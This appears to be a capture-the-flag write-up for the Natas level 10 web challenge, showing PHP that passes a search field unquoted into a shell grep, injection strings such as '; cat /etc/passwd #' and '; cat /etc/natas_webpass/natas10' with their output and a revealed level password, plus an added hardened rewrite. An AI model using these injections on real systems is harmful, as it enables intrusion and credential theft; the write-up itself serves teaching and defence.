Natas - Level 10

2 November 2017

Connection information

Information given

The white box is composed of three parts:

  1. The first part is an input box with the label Find words containing:
  2. The second is a button named Search
  3. The last is a link View sourcecode pointing to

Getting the password

Here is the interesting part of the server source code:

Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
<?php
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
    if($key != "") {
        // $key is interpolated into the shell command line unquoted
        passthru("grep -i $key dictionary.txt");
    }
}
?>

We can take a look at the file dictionary.txt stored here

It is just a list of words in alphabetical order. What is interesting is that $key is placed in the shell command unquoted, so we can do some injection. If we submit ; echo we will see the output


Poking with injections

Using ; cat /etc/passwd #

natas31:x:30031:30031:natas level 31:/home/natas31:/bin/bash
natas32:x:30032:30032:natas level 32:/home/natas32:/bin/bash
natas33:x:30033:30033:natas level 33:/home/natas33:/bin/bash
natas17:x:30017:30017:natas level 17:/home/natas17:/bin/bash

Use ; cat index.php # to see some page inception (and rediscover the password for natas9).


Remember in level 8, we had a hint:

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->

If we try to display /etc/natas_webpass/natas10, we get the password nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

; cat /etc/natas_webpass/natas10
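
How the passthru() call shown above could be hardened, as an added example that is not part of the original writeup or of the Natas source. The function names search_words and grep_command and the sample dictionary are assumptions made for the illustration.

```php
<?php
// Added example: two hardened replacements for
//   passthru("grep -i $key dictionary.txt");

// Option 1: no shell at all. Case-insensitive substring match done in PHP,
// so the input is only ever treated as data.
function search_words(string $needle, string $dictPath): array
{
    if ($needle === '') {
        return [];
    }
    $fh = fopen($dictPath, 'r');
    if ($fh === false) {
        throw new RuntimeException("cannot open $dictPath");
    }
    $hits = [];
    while (($line = fgets($fh)) !== false) {
        $word = rtrim($line, "\r\n");
        if (stripos($word, $needle) !== false) {
            $hits[] = $word;
        }
    }
    fclose($fh);
    return $hits;
}

// Option 2: keep grep, but pass the input as one quoted argument.
// escapeshellarg() stops ; | & # from reaching the shell as syntax,
// "--" stops a needle starting with "-" from being read as an option,
// and -F makes grep treat the needle as a fixed string, not a regex.
function grep_command(string $needle, string $dictPath): string
{
    return 'grep -i -F -- ' . escapeshellarg($needle)
         . ' ' . escapeshellarg($dictPath);
}

// Constructed sample dictionary (hypothetical contents).
$dict = tempnam(sys_get_temp_dir(), 'dict');
file_put_contents($dict, "apple\nBanana\ncherry\n");

// A normal query, then the injection string used earlier on this page.
foreach (['an', '; cat /etc/passwd #'] as $input) {
    echo "input:   $input\n";
    echo "matches: " . json_encode(search_words($input, $dict)) . "\n";
    echo "command: " . grep_command($input, $dict) . "\n\n";
}
unlink($dict);
```

With either option the injection string is searched for as literal text and matches nothing in the dictionary.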